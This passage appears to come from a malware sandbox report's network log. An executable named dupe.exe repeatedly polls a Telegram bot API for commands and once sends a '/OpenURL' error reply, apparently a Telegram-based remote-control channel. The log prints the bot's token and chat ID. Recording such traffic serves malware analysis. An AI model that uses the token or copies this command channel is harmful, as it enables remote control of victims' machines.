      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:53 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:54 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:55 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:56 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:57 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:58 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:19:59 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:00 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:02 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:03 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:07 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:08 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:09 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:10 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:11 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:12 GMT
      Content-Type: application/json
      Content-Length: 416
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:12 GMT
      Content-Type: application/json
      Content-Length: 382
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:13 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:14 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:15 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:16 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:17 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:18 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:20 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:21 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:22 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:23 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:24 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:25 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:26 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:27 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:28 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:30 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:31 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:32 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:33 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:34 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:36 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:37 GMT
      Content-Type: application/json
      Content-Length: 416
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
